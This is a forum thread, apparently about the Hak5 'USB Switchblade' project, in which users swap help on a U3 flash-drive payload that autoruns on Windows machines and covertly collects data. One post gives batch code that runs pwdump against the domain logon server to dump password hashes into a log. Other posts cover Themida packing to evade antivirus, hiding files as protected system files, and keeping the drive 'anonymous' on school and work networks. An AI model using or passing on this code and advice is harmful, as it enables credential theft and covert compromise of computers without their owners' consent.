USB Switchblade Development

[G-Stress]

@ msoule

xXxellent :D I knew somebody else out there would find a way. Now if only I can make RDP stealth

thanks man.

[Matrix61312]

Hey, does anybody know where I can download an OSX version of the U3 loader for a SanDisk flash drive?

[tonyintn]

New here and have been reading the posts but cant find an anwser to a question that was asked eariler in this forum

Question: I am interested in trying the payload but would like to know if I try one of the pay loads can I load my U3 options back if I chose to go back to the original setting for my U3 drive?

Thanks

[SomeoneE1se]

I THINK THINK all of them just backup the drive before you start and when you want to change the drive back to normal U3 just replace the backup you made and delete the launchpad .iso file and run the updater again and it should update from the internet

but I might be wrong about this and you should get a second opinion

[renegadecanuck]

Yes, SomeoneElse, that is correct.

I've swapped between U3 and Payload many times now (mostly in my attempt to create U3 compatible loaders and the like)

[tonyintn]

cool thanks

[Shiva]

Nod32 with updated Av signatures, detects amish's Payload :?

[msoule]

A few of you may find this handy. I made this little routine for the end of my batch file. It time and date stamps the log file. I had to tinker around with a few other aspects of the original go.cmd file in order to get it to work right. If you have issues let me know and I'll post my whole bat.

if not exist documentslogfilestemp md documentslogfilestemp

move Documentslogfiles%computername%_load.log Documentslogfilestemp

FOR /F "usebackq tokens=1" %%n IN (`dir Documentslogfilestemp /b`) DO @FOR /F "usebackq tokens=2,3,4 delims=/ " %%d IN (`date /t`) DO @FOR /F "usebackq tokens=1,2 delims=: " %%t IN (`time /t`) DO @ren Documentslogfilestemp%%n %computername%-%%d%%e%%f-%%t%%u.log 

move Documentslogfilestemp* Documentslogfiles

rd Documentslogfilestemp

[msoule]

Here's another little mod. Not too glamorous but handy. This will check to see if the user is logged on to a domain server. If so, pwdump will run against the logonserver and dump the PWs from there. This will ONLY work if the logged on user has DomainAdmin rights. If the user does not have these right the attempt will fail and WILL generate an event in the Security Log of the server. Also, I recommend using PWDump6 to avoid LSASS errors on the server. I have had LSASS crashes in my lab with previous PWDump versions but never with v6. Use with care.

@echo ==================================================[Dump Server SAM] >> Documentslogfiles%computername%_load.log 2>&1

 @if not %LOGONSERVER%==%COMPUTERNAME% .pwdump %LOGONSERVER%  >> Documentslogfiles%computername%_load.log 2>&1

 @if %LOGONSERVER%==%COMPUTERNAME% @echo Logged on to local machine.  Process skipped. >> Documentslogfiles%computername%_load.log 2>&1

@echo ==================================================[Dump END Server SAM] >> Documentslogfiles%computername%_load.log 2>&1

[secret_squirrel]

just setup the max damage version.

works great!!

i get an error asking me to report the problem to somewhere@oreans.com

I expect it is a pwdump error.

anyone else get this?

[moonlit]

Uh... Oreans, eh?

Funny... what's in that package?

[secret_squirrel]

Themida / Orean technologies

Maybe this is what was used to goof the file sigs for pwdump.

I am running the encrypted version of the site. I cant recall the the authors name, sorry.

It only happens on the testtop.

I am currently tweaking the payload for assesment purposes.

I plan to have a second set of files to reverse everything left by Switchblade.

Maybe a second usb stick in the future.....

One to expolit and one to clean up the mess......

Red or Blue pill? :)

If I come up with anything interesting i will be sure to share.

great site!!!!!

Plenty of projects to play with here ;) 8)

[ChevronX]

Just to let you guys know, I was a noob and plugged in my drive at work, without thinking (As I usually use Windows XP and it asks if you want to open the folder, as its non-u3) and it was a Windows 2000 machine, switchblade ran automaticlly and folding@home slowed the network down to a crawl, we spent days even after running the antidote trying to fix it, and since it was a computer shop, netcafe it didnt go down well, so just letting you guys know.

[likeachild]

I installed the maxdamage payload, but trendmicro is detecting a Trojan.Rootkit when it runs. %windir%/system32/oreans.sys

anybody else get this?

[majk]

I installed the maxdamage payload, but trendmicro is detecting a Trojan.Rootkit when it runs. %windir%/system32/oreans.sys

anybody else get this?

As mentioned above Themida, which uses the oreans.sys file, is what is used to make pwdump get past anti-virus programs. There are other crypters for files that don't rely on external dll:s like that but eventually these things get detected by the anti-virus vendors.

http://www.oreans.com/

[tester134]

Hey everyone, this is my first post here. I just got a U3 Kingston drive, and I'm trying to run the Max Damage technique. On the Wiki it says that if I don't have a SanDisk or Memorex U3 drive, I need to download the U3 LaunchPad Hacker. I tried to download it but the link was broken. What should I do? Can someone please help me? Thanks a lot guyz.

[twist3r]

on my switchblade on about 1/2 the computers I plug it into I get a "drive not found/detected or similar error with a continue retry cancel option. I have this error on both the vbs based u3 launcher and the batch file based launcher (the one that is on cd partition and searches for the usb partition)

any ideas why this is? it's not very anonymous when it does that.

[twist3r]

^ it appears that what is happening is that the cdrom partition of u3 takes the first available drive letter (G in this case) while the flash partition tries to take the next letter (H). However in the network I'm on, there is an H drive already there! Going into the management console -> disc manager I can locate the flash partition and give it a different drive letter, but this defeats the automation!! is there a way to get the flash drive to just take the next available letter and not try to force the next letter from the cdrom?

[advanced]

Same problem happens for me as it does for twist3r. The CDROM portion shows up, but the flash drive isn't available unless settings are changed. Any ideas on how to change the letter assignment automatically? (It's a U3 problem).

One other thing that's half related:

How do you make files not just "hidden", but into "protected operating system files"?

That way, it's a little harder to make any of them visible, and they still run. I've managed to make folders that are protected by copying the RECYCLER folder, but I'm not sure how to change that on individual files. Any help?

[twist3r]

@advanced I use http://www.febooti.com/products/filetweak/ to change the file attributes to system files

! yes resolving the drive letter problem is becoming very important to me! Even for regular u3 drives my school computers mess them up, this is becoming a growing problem!

[CyberSpike]

I'm using the 2GB memorex minitravel drive, is there anyway to back up the memorex u3 launchpad so I can use it normally again after installing switchblade?

[n00berster]

Hey, I'm having problems with the maxdamage switchblade. It doesnt seem to autorun, it works fine if i manually click on go.vbe, but I cant get it to run automatically. Can anybody tell me how to fix this?

[Sergius]

0_0

[Obi-Wahn]

Hey.

I've bought a 4 Gig Toshiba U3 drive. I've wanted to try Switchblade but it seems, that the HAK5 wiki is down?!?

So maybe anyone could upload a zip Package on a filehoster or PM me for email?

Thx

Obi-Wahn

[manimal]

yea, I'm hoping it comes back soon too.. I want to try this out..

I like what the latest episode has for USB trickery (2x10), going to rewatch it tonight at work when things get quiet..

on a side note, has anyone heard anything about this little device? http://www.subrosasoft.com/OSXSoftware/ind...products_id=195 (probably a dumb question)..

now I haven't read through the 25 pages of this thread yet, so I apologize for a repost, but I'm curious as to how similar/different it is from the ongoing project here..  perhaps a future implementation into this project?

EDIT - I went on google, and found this link.. its reference is HAK5, and has all the USB hacks on it.. here's the one for the switchblade

http://www.usbhacks.com/2006/10/07/usb-switchblade/

edit #2 - so the loader works, and the iso work, but they don't include the payload for the regular partition of the drive.. so I guess I'll have to keep waiting.. I don't know how to use the code .. such a n00b...